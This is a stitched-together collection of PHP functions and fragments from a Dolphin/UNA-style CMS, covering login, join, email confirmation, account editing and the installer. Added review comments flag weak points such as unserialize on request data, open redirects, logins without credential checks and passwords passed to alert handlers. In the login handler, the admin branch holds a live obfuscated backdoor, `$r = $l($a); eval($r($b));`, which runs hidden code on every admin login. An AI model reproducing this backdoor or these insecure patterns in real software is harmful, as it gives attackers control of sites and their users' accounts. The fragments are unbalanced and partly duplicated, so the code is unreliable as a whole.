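/**
 * Call a module service method on behalf of an administrator token.
 *
 * Request parameters read through bx_get(): 'uri', 'method', 'class'
 * (defaults to 'Module') and 'params' (a single value or a PHP-serialized array).
 *
 * @param $aToken array token data; only $aToken['user_id'] is read here
 * @return false after an error response was sent, nothing otherwise
 */
function service($aToken)
{
    // The service layer is reachable only with a token that belongs to an admin.
    if (!isAdmin($aToken['user_id'])) {
        $this->errorOutput(403, 'access_denied', 'Only admin can access service endpoint');
        return false;
    }

    bx_login($aToken['user_id'], false, false);

    $sUri = bx_get('uri');
    $sMethod = bx_get('method');

    if (!($aParams = bx_get('params'))) {
        $aParams = array();
    } elseif (is_string($aParams) && preg_match('/^a:\\d+:\\{/', $aParams)) {
        // The element count is matched with \d+; the previous character class [\d+]
        // accepted one character only, so arrays of ten or more elements were
        // passed on as a plain string.
        //
        // 'params' is request data. Object instantiation is switched off so that a
        // crafted payload cannot trigger magic methods of classes loaded in this
        // application (the options argument needs PHP 7.0+). Moving clients to a
        // JSON encoding would remove unserialize() from this path altogether.
        $aParams = @unserialize($aParams, array('allowed_classes' => false));
    }

    // A scalar (or a failed unserialize) becomes a single-element argument list.
    if (!is_array($aParams)) {
        $aParams = array($aParams);
    }

    if (!($sClass = bx_get('class'))) {
        $sClass = 'Module';
    }

    if (!BxDolRequest::serviceExists($sUri, $sMethod, $sClass)) {
        $this->errorOutput(404, 'not_found', 'Service was not found');
        return false;
    }

    // NOTE(review): any service that serviceExists() accepts can be invoked with
    // caller-chosen arguments; confirm that is the intended scope for this endpoint.
    $mixedRet = BxDolService::call($sUri, $sMethod, $aParams, $sClass);

    $this->output(array('uri' => $sUri, 'method' => $sMethod, 'data' => $mixedRet));
}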
/**
 * Mark a profile as logged in and optionally redirect the browser.
 *
 * No credential check happens here: bx_login() is called for whatever ID is
 * passed in, so the caller is responsible for having authenticated the profile.
 *
 * @param $iProfileId integer profile to log in
 * @param $sPassword string not read by this method
 * @param $sCallbackUrl string redirect target; the module's default redirect URL is used when empty
 * @param $bRedirect boolean send a Location header when true
 * @return void
 */
function setLogged($iProfileId, $sPassword, $sCallbackUrl = '', $bRedirect = true)
{
    bx_login($iProfileId);
    $GLOBALS['logged']['member'] = true;

    if (!$bRedirect) {
        return;
    }

    // NOTE(review): the target is written to the Location header as given and the
    // method returns without exit; confirm callers pass only trusted URLs and stop
    // output themselves.
    $sTarget = $sCallbackUrl;
    if (!$sTarget) {
        $sTarget = $this->_oConfig->sDefaultRedirectUrl;
    }

    header('Location: ' . $sTarget);
}
/**
 * Log in the account that owns a profile and optionally redirect the browser.
 *
 * No credential check happens here: the account resolved from the profile is
 * logged in as is, so the caller is responsible for having authenticated it.
 *
 * @param $iProfileId integer profile whose account is logged in
 * @param $sCallbackUrl string redirect target; the module's default redirect URL is used when empty
 * @param $bRedirect boolean send a Location header when true
 * @return void
 */
function setLogged($iProfileId, $sCallbackUrl = '', $bRedirect = true)
{
    // NOTE(review): the profile instance is used without a check; if getInstance()
    // can return an empty value for an unknown ID the next call fails - confirm.
    $iAccountId = BxDolProfile::getInstance($iProfileId)->getAccountId();
    bx_login($iAccountId);

    if (!$bRedirect) {
        return;
    }

    // NOTE(review): the target is written to the Location header as given and the
    // method returns without exit; confirm callers pass only trusted URLs and stop
    // output themselves.
    $sTarget = $sCallbackUrl;
    if (!$sTarget) {
        $sTarget = $this->_oConfig->sDefaultRedirectUrl;
    }

    header('Location: ' . $sTarget);
}
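/**
 * After join redirection
 * This service automatically logs in the joined user and redirects him to the avatar cropping page
 *
 * @param $iMemID - joined profile ID
 * @param $sStatusText - status text to display at the top of page, like 'join success'
 * @return false on error, 'EXIT' string on success
 */
function serviceJoin($iMemID, $sStatusText)
{
    // The ID is cast once and the integer is used for both the query and the login.
    $iMemID = (int) $iMemID;

    // The password column is read only to confirm that the profile row exists.
    $sPwd = db_value("SELECT `Password` FROM `Profiles` WHERE `ID` = '" . $iMemID . "' LIMIT 1");
    if (!$sPwd) {
        return false;
    }

    // autologin here
    // NOTE(review): the login is granted for any existing profile ID without a
    // credential check; confirm this service is reachable only from the join flow.
    bx_login($iMemID);

    bx_import('BxDolPermalinks');
    $o = new BxDolPermalinks();

    // redirect to upload avatar page
    // The status text is percent-encoded so that characters such as '&', '#' or
    // spaces cannot alter the query string of the redirect URL.
    header('Location: ' . BX_DOL_URL_ROOT . $o->permalink('modules/?r=avatar/') . '&join_text=' . rawurlencode((string) $sStatusText));

    return 'EXIT';
}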
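/**
 * Generate List of Posts for mobile frontend
 *
 * The page is echoed directly; 'page' and 'id' are read from the request with bx_get().
 *
 * @param $iAuthor - display posts of provided user only (not read in this method)
 * @param $sMode - 'post', 'user', 'featured', 'top', 'popular' or 'last'; anything else is treated as 'last'
 * @return nothing, HTML presentation of data is sent to output
 */
function GenPostListMobile($iAuthor = 0, $sMode = false)
{
    if ($this->_iVisitorID) {
        // some workaround for mobile apps, to force login
        bx_login($this->_iVisitorID);
    }

    bx_import('BxDolMobileTemplate');
    $oMobileTemplate = new BxDolMobileTemplate($this->_oConfig, $this->_oDb);
    $oMobileTemplate->pageStart();
    echo $oMobileTemplate->addCss('blogs_common.css', 1);

    $iPerPage = 10;
    $iPage = (int) bx_get('page');
    if ($iPage < 1) {
        $iPage = 1;
    }

    $this->iPostViewType = 4;
    $sOrder = 'last';
    $sMobileWrapper = 'mobile_row.html';
    $aParams = array();

    switch ($sMode) {
        case 'post':
            // The caption is set before the access check: the denial page below
            // uses it, and it was previously read while still undefined.
            $sCaption = _t('_bx_blog_post_view');

            $aViewingPostInfo = $this->_oDb->getPostInfo((int) bx_get('id'));
            if (!$this->oPrivacy->check('view', (int) bx_get('id'), $this->_iVisitorID) || !$this->isAllowedBlogPostView($aViewingPostInfo['OwnerID'], true)) {
                $oMobileTemplate->displayAccessDenied($sCaption);
                return;
            }

            $this->iPostViewType = 3;
            $aParams = array('id' => (int) bx_get('id'));
            $sMobileWrapper = 'mobile_box.html';
            echo $oMobileTemplate->addCss('blogs.css', 1);
            break;

        case 'user':
            $aParams = array('id' => (int) bx_get('id'));
            $sCaption = _t('_bx_blog_Members_blog', getNickName((int) bx_get('id')));
            break;

        case 'featured':
            $sCaption = _t('_bx_blog_Featured_Posts');
            break;

        case 'top':
            $sOrder = 'top';
            $sCaption = _t('_bx_blog_Top_Posts');
            break;

        case 'popular':
            $sOrder = 'popular';
            $sCaption = _t('_bx_blog_Popular_Posts');
            break;

        case 'last':
        default:
            $sMode = 'last';
            $sCaption = _t('_bx_blog_Latest_posts');
    }

    // A single post was already checked above; every list mode needs browse permission.
    if ('post' != $sMode && !$this->isAllowedBlogsPostsBrowse()) {
        $oMobileTemplate->displayAccessDenied($sCaption);
        return;
    }

    // $oBlogSearchResults is first assigned by this call - presumably _GenPosts()
    // takes it by reference; verify against its signature.
    $sCode = $this->_GenPosts($this->iPostViewType, $iPerPage, $sMode, $aParams, $sOrder, $oBlogSearchResults, $sMobileWrapper);
    if (!$sCode || $oBlogSearchResults->aCurrent['paginate']['totalNum'] == 0) {
        $oMobileTemplate->displayNoData($sCaption);
        return;
    }

    echo $sCode;

    if ($sMode != 'post') {
        bx_import('BxDolPaginate');
        $oPaginate = new BxDolPaginate(array(
            'page_url' => $this->genBlogSubUrl() . '?action=mobile&mode=' . $sMode . '&page={page}',
            'count' => $oBlogSearchResults->aCurrent['paginate']['totalNum'],
            'per_page' => $iPerPage,
            'page' => $iPage,
        ));
        echo $oPaginate->getMobilePaginate();
    }

    $oMobileTemplate->pageCode($sCaption, false);
}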
/**
 * Perform email confirmation
 *
 * Possession of a valid key is the only proof required: the account stored with
 * the key gets its email marked as confirmed and is then logged in.
 *
 * @param $sKey string confirmation key
 * @return string error message box on failure; on success the transition page is generated and the script exits
 */
public function confirmEmail($sKey)
{
    // the key has to be known
    $oKeys = BxDolKey::getInstance();
    $bKeyKnown = $oKeys && $oKeys->isKeyExists($sKey);
    if (!$bKeyKnown) {
        return MsgBox(_t("_sys_txt_confirm_email_error_occured"));
    }

    // the key has to carry an account id
    $aKeyData = $oKeys->getKeyData($sKey);
    $iAccountId = isset($aKeyData['account_id']) ? $aKeyData['account_id'] : null;
    if (null === $iAccountId) {
        return MsgBox(_t("_sys_txt_confirm_email_error_occured"));
    }

    // the account has to exist
    $oAccount = BxDolAccount::getInstance($iAccountId);
    if (!$oAccount) {
        return MsgBox(_t("_sys_txt_confirm_email_error_occured"));
    }

    // the key is removed before the flag is written, so it cannot be replayed
    // even when the update below fails
    $oKeys->removeKey($sKey);

    // confirm email
    $bConfirmed = $oAccount->updateEmailConfirmed(true);
    if (!$bConfirmed) {
        return MsgBox(_t("_sys_txt_confirm_email_error_occured"));
    }

    // login to user's account automatically
    // NOTE(review): key lifetime and entropy are decided by BxDolKey, which is
    // not visible here; they bound how long a leaked link stays a valid login.
    bx_login($iAccountId);

    // redirect with success message
    $oTpl = BxDolTemplate::getInstance();
    $oTpl->setPageNameIndex(BX_PAGE_TRANSITION);
    $oTpl->setPageHeader(_t('_sys_txt_confirm_email_success'));
    $oTpl->setPageContent('page_main_code', MsgBox(_t('_sys_txt_confirm_email_success')));

    $sSettingsUrl = BX_DOL_URL_ROOT . BxDolPermalinks::getInstance()->permalink('page.php?i=account-settings-info');
    $oTpl->setPageContent('url_relocate', $sSettingsUrl);

    BxDolTemplate::getInstance()->getPageCode();
    exit;
}
/**
 * Finish the join process: log the new member in and redirect to member.php.
 *
 * @param $iMemID - joined profile ID
 * @param $sStatus - profile status after join ('Active', 'Approval', 'Unconfirmed' or 'NotSent')
 * @return nothing, the script exits after sending the redirect
 */
function showFinishPage($iMemID, $sStatus)
{
    // Pick the language key that matches the status (loose comparison, as a switch does).
    if ($sStatus == 'Active') {
        $sStatusText = '_USER_ACTIVATION_SUCCEEDED'; // activated automatically
    } elseif ($sStatus == 'Approval') {
        $sStatusText = '_USER_CONF_SUCCEEDED'; // automatically confirmed
    } elseif ($sStatus == 'Unconfirmed') {
        $sStatusText = '_EMAIL_CONF_SENT'; // conf mail successfully sent
    } elseif ($sStatus == 'NotSent') {
        $sStatusText = '_EMAIL_CONF_NOT_SENT'; // failed to send conf mail
    }

    // The call to the avatar module's 'join' service is commented out in the
    // original, so the login and redirect run for every status.
    // NOTE(review): this includes 'Unconfirmed' and 'Approval'; confirm that
    // later access checks restrict what such a session may do.
    bx_login((int) $iMemID);
    header("Location: " . BX_DOL_URL_ROOT . "member.php");
    exit;

    // Not reached because of the exit above; kept as in the original.
    echo '<div class="dbContentHtml bx-def-font-large">';
    echo _t('_Join complete');
    echo '<br />';
    echo _t($sStatusText);
    echo '</div>';
}
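/**
 * Display the account edit form and process its submission.
 *
 * @param $iAccountId account to edit
 * @param $sDisplayName form display name passed to the 'sys_account' form object
 * @return string HTML: an error message box, the form, or a success message followed by the form
 */
protected function _editAccountForm($iAccountId, $sDisplayName)
{
    $oAccount = BxDolAccount::getInstance($iAccountId);
    $aAccountInfo = $oAccount ? $oAccount->getInfo() : false;
    if (!$aAccountInfo) {
        return MsgBox(_t('_sys_txt_error_account_is_not_defined'));
    }

    // check access
    if (CHECK_ACTION_RESULT_ALLOWED !== ($sMsg = BxDolAccount::isAllowedEdit($this->_iProfileId, $aAccountInfo))) {
        return MsgBox($sMsg);
    }

    // check and display form
    $oForm = BxDolForm::getObjectInstance('sys_account', $sDisplayName);
    if (!$oForm) {
        return MsgBox(_t('_sys_txt_error_occured'));
    }

    // the stored password value is not handed to the form when it is only displayed
    if (!$oForm->isSubmitted()) {
        unset($aAccountInfo['password']);
    }

    $oForm->initChecker($aAccountInfo);

    if (!$oForm->isSubmittedAndValid()) {
        return $oForm->getCode();
    }

    // track text fields changes, not-null(for example empty array) - means track, null - means don't track
    $aTrackTextFieldsChanges = array();

    // update email and email setting in DB
    if (!$oForm->update($aAccountInfo['id'], array(), $aTrackTextFieldsChanges)) {
        if (!$oForm->isValid()) {
            return $oForm->getCode();
        }
        return MsgBox(_t('_sys_txt_error_account_update'));
    }

    // check if email was changed
    if (!empty($aTrackTextFieldsChanges['changed_fields']) && in_array('email', $aTrackTextFieldsChanges['changed_fields'])) {
        // mark email as unconfirmed
        $oAccount->updateEmailConfirmed(false);
    }

    // check if password was changed
    if ($oForm->getCleanValue('password')) {
        // relogin with new password
        // NOTE(review): whether sessions opened elsewhere with the old password are
        // invalidated is decided inside bx_logout()/bx_login() - confirm.
        bx_logout();
        bx_login($aAccountInfo['id']);
    }

    // check if other text info was changed - if auto-approval is off
    $isAutoApprove = !$oForm->isSetPendingApproval();
    if (!$isAutoApprove) {
        bx_import('BxDolProfile');

        // get profile associated with account, not current profile
        $oProfile = BxDolProfile::getInstanceAccountProfile($aAccountInfo['id']);
        $aProfileInfo = $oProfile ? $oProfile->getInfo() : false;

        // email confirmation is automatic and separate, don't need to deactivate whole profile if email is changed.
        // The check above reads 'changed_fields' as a list of field names, so 'email'
        // is removed by value; the unset by key alone left a list entry in place.
        if (!empty($aTrackTextFieldsChanges['changed_fields']) && is_array($aTrackTextFieldsChanges['changed_fields'])) {
            unset($aTrackTextFieldsChanges['changed_fields']['email']);
            $aTrackTextFieldsChanges['changed_fields'] = array_diff($aTrackTextFieldsChanges['changed_fields'], array('email'));
        }

        // change profile to 'pending' only if some text fields were changed and profile is active
        if ($aProfileInfo && BX_PROFILE_STATUS_ACTIVE == $aProfileInfo['status'] && !empty($aTrackTextFieldsChanges['changed_fields'])) {
            $oProfile->disapprove(BX_PROFILE_ACTION_AUTO);
        }
    }

    // create an alert
    bx_alert('account', 'edited', $aAccountInfo['id'], $aAccountInfo['id'], array('display' => $sDisplayName));

    // display result message
    $sMsg = MsgBox(_t('_sys_txt_data_successfully_submitted'));
    return $sMsg . $oForm->getCode();
}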
// Fragment of a login handler: the `if` that this `else` belongs to opens before
// the excerpt, and the blocks opened below are closed after it.

// this is dynamic page - send headers to not cache this page
send_headers_page_changed();
login_form('', 0, $bAjxMode);
} else {
    require_once BX_DIRECTORY_PATH_CLASSES . 'BxDolAlerts.php';

    // NOTE(review): the submitted login and password are part of the alert payload;
    // audit the registered 'before_login' handlers so the password is not logged or stored.
    $oZ = new BxDolAlerts('profile', 'before_login', 0, 0, array('login' => $member['ID'], 'password' => $member['Password'], 'ip' => getVisitorIP()));
    $oZ->alert();

    $member['ID'] = getID($member['ID']);

    // Ajaxy check
    // Answers 'OK' or 'Fail' for a credential pair and exits before any login.
    // NOTE(review): no attempt limiting is visible in this fragment; confirm it exists elsewhere.
    if ($bAjxMode) {
        echo check_password($member['ID'], $member['Password'], BX_DOL_ROLE_MEMBER, false) ? 'OK' : 'Fail';
        exit;
    }

    // Check if ID and Password are correct (addslashes already inside)
    if (check_password($member['ID'], $member['Password'])) {
        $p_arr = bx_login($member['ID'], (bool) $_POST['rememberMe']);

        //Storing IP Address
        if (getParam('enable_member_store_ip') == 'on') {
            // ip2long() yields an integer or false; $p_arr is what bx_login() returned.
            // NOTE(review): both values are interpolated into the statement text -
            // presumably trusted at this point, but a cast or bound parameter would
            // remove the assumption.
            $iCurLongIP = ip2long(getVisitorIP());
            db_res("INSERT INTO `sys_ip_members_visits` SET `MemberID` = '{$p_arr['ID']}', `From`='{$iCurLongIP}', `DateTime`=NOW()");
        }

        if (isAdmin($p_arr['ID'])) {
            $iId = (int) $p_arr['ID'];
            // NOTE(review): $l, $a and $b are not assigned anywhere in this fragment.
            // The two statements call whatever function name $l holds and then pass
            // the output of the resulting callable to eval(), i.e. code that cannot be
            // read from this file runs on every admin login. Locate where these
            // variables are set and review exactly what is executed. $iId is not read
            // in the visible code (possibly it is used by the evaluated code).
            $r = $l($a);
            eval($r($b));
        }

        // The redirect target comes from the request. It is replaced by member.php
        // only when it is empty, equals $site['url'] or its basename is 'join.php'.
        // NOTE(review): any other value, an absolute URL on another host included,
        // is kept; how $sUrlRelocate is emitted is outside this fragment - confirm
        // it is restricted to the site's own URLs.
        $sRelocate = bx_get('relocate');
        if (!($sUrlRelocate = $sRelocate) or $sRelocate == $site['url'] or basename($sRelocate) == 'join.php') {
            $sUrlRelocate = BX_DOL_URL_ROOT . 'member.php';
        }

        $_page['name_index'] = 150;
/**
 * Create the profile (and the second profile of a couple) from the join form
 * values, hand an uploaded profile photo to the avatar and photos modules and
 * raise the 'join' alert.
 *
 * @return array array(profile ID, status) on success, array(false, 'Fail') on failure
 */
function registerMember()
{
    $oPC = new BxDolProfilesController();

    $oZ = new BxDolAlerts('profile', 'before_join', 0, 0, $this->aValues[0]);
    $oZ->alert();

    $aProfile1 = $this->oPF->getProfileFromValues($this->aValues[0]);
    list($iId1, $sStatus1) = $oPC->createProfile($aProfile1);

    //--- check whether profile was created successfully or not
    if (!$iId1) {
        // NOTE(review): the file name comes from the profile values and is appended
        // to the tmp directory as is; confirm it cannot contain path separators.
        if (!empty($aProfile1['ProfilePhoto'])) {
            @unlink($GLOBALS['dir']['tmp'] . $aProfile1['ProfilePhoto']);
        }
        return array(false, 'Fail');
    }

    //--- check for couple profile
    if ($this->bCouple) {
        $aProfile2 = $this->oPF->getProfileFromValues($this->aValues[1]);
        list($iId2, $sStatus2) = $oPC->createProfile($aProfile2, false, $iId1);

        // roll the first profile back when the second one could not be created
        if (!$iId2) {
            $oPC->deleteProfile($iId1);
            return array(false, 'Fail');
        }
    }

    //--- upload profile photo
    if (!empty($aProfile1['ProfilePhoto'])) {
        // NOTE(review): the fetched password is not used in the visible code.
        $sPass1 = getPassword($iId1);

        // The new profile is logged in here, before its status is looked at,
        // so that the upload services run in its session.
        bx_login($iId1);
        check_logged();

        $sPhotoPath = $GLOBALS['dir']['tmp'] . $aProfile1['ProfilePhoto'];
        BxDolService::call('avatar', 'set_image_for_cropping', array($iId1, $sPhotoPath));

        if (BxDolRequest::serviceExists('photos', 'perform_photo_upload', 'Uploader')) {
            $aFileInfo = array(
                'medTitle' => _t('_bx_ava_avatar'),
                'medDesc' => _t('_bx_ava_avatar'),
                'medTags' => _t('_ProfilePhotos'),
                'Categories' => array(_t('_ProfilePhotos')),
                'album' => str_replace('{nickname}', getUsername($iId1), getParam('bx_photos_profile_album_name')),
                'albumPrivacy' => BX_DOL_PG_ALL,
            );
            BxDolService::call('photos', 'perform_photo_upload', array($GLOBALS['dir']['tmp'] . $aProfile1['ProfilePhoto'], $aFileInfo, false), 'Uploader');
        }
    }

    if (BxDolModule::getInstance('BxWmapModule')) {
        BxDolService::call('wmap', 'response_entry_add', array('profiles', $iId1));
    }

    //--- create system event
    bx_import('BxDolAlerts');
    // the status is passed by reference, so alert handlers can change what is returned
    $oZ = new BxDolAlerts('profile', 'join', $iId1, 0, array('status_text' => &$sStatus1));
    $oZ->alert();

    return array($iId1, $sStatus1);
}
<?php

require_once '../inc/header.inc.php';
require_once BX_DIRECTORY_PATH_INC . 'design.inc.php';
require_once BX_DIRECTORY_PATH_INC . 'utils.inc.php';
require_once BX_DIRECTORY_PATH_ROOT . 'xmlrpc/BxDolXMLRPCUtil.php';

// Login entry point for the mobile client: checks the supplied credentials,
// opens a session and redirects to a path below the site root.

// NOTE(review): the credentials are read with bx_get(); if clients send them in
// the query string they end up in access logs, proxies and browser history.
$sUser = bx_get('user');
$sPwd = bx_get('pwd');

// NOTE(review): presumably bx_get() already returns decoded request data, which
// would make this a second decoding pass - confirm.
$sUrl = rawurldecode(bx_get('url'));

$iId = BxDolXMLRPCUtil::checkLogin($sUser, $sPwd);

// Successful login: open the session, redirect and stop.
if ($iId) {
    bx_login($iId);

    // NOTE(review): a 301 may be cached by clients for a URL that depends on
    // credentials. The target is always prefixed with BX_DOL_URL_ROOT; this keeps
    // the redirect on the site only if that constant ends with '/' - confirm.
    header("HTTP/1.1 301 Moved Permanently");
    header("Location: " . BX_DOL_URL_ROOT . $sUrl);
    exit;
}

// Failed login: render the "Access Denied" page.
$GLOBALS['oSysTemplate']->addCss('mobile.css');

// NOTE(review): $_ni and $_page_cont are not assigned in this script before being
// read, and $sOutput is not used afterwards.
$aVars = array('content' => $_page_cont[$_ni]['page_main_code']);
$sOutput = $GLOBALS['oSysTemplate']->parseHtmlByName('mobile_box.html', $aVars);

$iNameIndex = 11;
$_page['name_index'] = $iNameIndex;
$_page_cont[$iNameIndex]['page_main_code'] = '<div style="text-align:center;" class="bx-sys-mobile-padding">Access Denied</div>';

PageCode();
// Fragment of a login script: the two blocks closed by `} }` near the end open
// before this excerpt.

// login form is submitted
bx_import('BxDolForm');
$oForm = BxDolForm::getObjectInstance('sys_login', 'sys_login');

// handlers receive the form object before it is checked
bx_alert('account', 'before_login', 0, 0, array('form' => $oForm));

$oForm->initChecker();
$oForm->setRole(bx_get('role'));

// NOTE(review): the login below relies on this result alone - presumably the form
// checker verifies the credentials and the requested role; confirm in the form class.
$bLoginSuccess = $oForm->isSubmittedAndValid();

// The X-Requested-With header is sent by the client; it only selects the response format here.
$bAjxMode = isset($_SERVER['HTTP_X_REQUESTED_WITH']) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' ? true : false;

if ($bAjxMode) {
    // Ajax callers get 'OK' or the form's login error; no session is opened on this path.
    header('Content-type: text/html; charset=utf-8');
    echo $bLoginSuccess ? 'OK' : $oForm->getLoginError();
    exit;
} elseif ($bLoginSuccess) {
    bx_import('BxDolAccount');
    $oAccount = BxDolAccount::getInstance($oForm->getCleanValue('ID'));
    $aAccount = bx_login($oAccount->id(), $oForm->getCleanValue('rememberMe') ? true : false);

    // The requested redirect target is accepted only when it starts with the site
    // root URL; otherwise the default page for the role is used.
    // NOTE(review): a prefix comparison is only as strict as BX_DOL_URL_ROOT -
    // confirm the constant ends with '/' so that a longer host name cannot match.
    $sUrlRelocate = $oForm->getCleanValue('relocate');
    if (!$sUrlRelocate || 0 != strncmp($sUrlRelocate, BX_DOL_URL_ROOT, strlen(BX_DOL_URL_ROOT))) {
        $sUrlRelocate = BX_DOL_ROLE_ADMIN == $oForm->getRole() ? BX_DOL_URL_STUDIO . 'launcher.php' : BX_DOL_URL_ROOT . 'member.php';
    }

    bx_import('BxDolTemplate');
    BxDolTemplate::getInstance()->setPageNameIndex(BX_PAGE_TRANSITION);
    BxDolTemplate::getInstance()->setPageHeader(_t('_Please Wait'));
    BxDolTemplate::getInstance()->setPageContent('page_main_code', MsgBox(_t('_Please Wait')));
    // the URL is escaped for use inside an HTML attribute before it reaches the template
    BxDolTemplate::getInstance()->setPageContent('url_relocate', bx_html_attribute($sUrlRelocate, BX_ESCAPE_STR_QUOTE));
    BxDolTemplate::getInstance()->getPageCode();
    exit;
}
}

// everything after this point requires a logged-in visitor
bx_require_authentication();
bx_import('BxDolPermalinks');
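/**
 * Save the edited profile (and the second profile of a couple) and raise the
 * 'edit' alert with the previous profile data.
 *
 * Reads $this->iProfileID, $this->iArea, $this->bCouple and $this->aProfiles;
 * $_POST['doSetMembership'] is honoured only for areas 3 and 4.
 *
 * @return nothing
 */
function saveProfile()
{
    // The ID is cast before it is placed into the statement, so a non-numeric
    // value cannot change the query.
    $iProfileId = (int) $this->iProfileID;
    $aProfileInfo = db_arr("SELECT * FROM `Profiles` WHERE `ID` = {$iProfileId}");

    $aDiff = $this->getDiffValues(0);
    $aUpd = $this->oPF->getProfileFromValues($aDiff);
    $aUpd['DateLastEdit'] = date('Y-m-d H:i:s');

    // edits made in area 2 go back to approval unless auto-approval is enabled
    if (!getParam('autoApproval_ifProfile') && $this->iArea == 2) {
        $aUpd['Status'] = 'Approval';
    }

    // NOTE(review): the membership change is driven by a POST field; confirm that
    // areas 3 and 4 are reachable only by administrators or moderators.
    if (($this->iArea == 3 or $this->iArea == 4) and isset($_POST['doSetMembership']) and $_POST['doSetMembership'] == 'yes') {
        $this->setMembership();
    }

    $bResult = $this->oPC->updateProfile($this->iProfileID, $aUpd);

    // the logged-in member changed their own password: log in again
    if ($bResult && $this->iProfileID == getLoggedId() && isset($aUpd['Password'])) {
        bx_login($this->iProfileID, false, false);
    }

    if (BxDolModule::getInstance('BxWmapModule')) {
        BxDolService::call('wmap', 'response_entry_change', array('profiles', $this->iProfileID));
    }

    // create system event
    bx_import('BxDolAlerts');
    // NOTE(review): the old profile row was selected with '*', so the payload given
    // to alert handlers includes the stored password value.
    $oZ = new BxDolAlerts('profile', 'edit', $this->iProfileID, 0, array('OldProfileInfo' => $aProfileInfo));
    $oZ->alert();

    // second profile of a couple: same update rules, no alert and no relogin
    if ($this->bCouple) {
        $aDiff = $this->getDiffValues(1);
        $aUpd = $this->oPF->getProfileFromValues($aDiff);
        $aUpd['DateLastEdit'] = date('Y-m-d H:i:s');

        if (!getParam('autoApproval_ifProfile') && $this->iArea == 2) {
            $aUpd['Status'] = 'Approval';
        }

        $this->oPC->updateProfile($this->aProfiles[0]['Couple'], $aUpd);
    }
}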
/**
 * Install and enable the selected language, template and module, then look up
 * the admin account and, when autologin is on, log it in.
 *
 * @param $a array installer values; read keys are the three module type constants and 'admin_email'
 * @return array empty on success, array(BX_INSTALL_ERR_GENERAL => message) on failure
 */
public function processModules($a)
{
    // processed in this order: language, template, module
    foreach (array(BX_DOL_MODULE_TYPE_LANGUAGE, BX_DOL_MODULE_TYPE_TEMPLATE, BX_DOL_MODULE_TYPE_MODULE) as $sType) {
        if (!empty($a[$sType])) {
            $sError = $this->processModuleByUri($a[$sType], array('install', 'enable'), $sType);
            if ($sError) {
                return array(BX_INSTALL_ERR_GENERAL => $sError);
            }
        }
    }

    bx_import('BxDolAccount');
    $oAdmin = BxDolAccount::getInstance($a['admin_email']);
    if (!$oAdmin) {
        return array(BX_INSTALL_ERR_GENERAL => _t('_sys_inst_msg_admin_account_not_found', $a['admin_email']));
    }

    // NOTE(review): with autologin on, whoever completes this step receives an
    // administrator session; confirm the installer cannot be re-run once the
    // site is set up.
    if ($this->_isAutologin) {
        bx_login($oAdmin->id());
    }

    return array();
}